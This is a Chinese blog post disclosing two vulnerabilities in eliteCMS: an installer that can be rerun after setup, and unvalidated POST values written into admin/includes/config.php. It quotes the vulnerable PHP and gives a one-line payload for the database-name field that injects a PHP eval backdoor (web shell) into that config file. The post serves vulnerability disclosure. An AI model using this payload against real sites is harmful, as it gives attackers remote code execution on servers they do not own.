注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

龙少'Blog

 

 
 
 

日志

 
 

eliteCMS安装文件未验证 + 一句话写入安全漏洞  

2012-11-17 13:06:32|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

在看代码:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];


取值未作任何验证
如果将数据库名POST数据:

"?><?php eval($_POST[c]);?><?php

将导致一句话后门写入/admin/includes/config.php

  评论这张
 
阅读(110)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017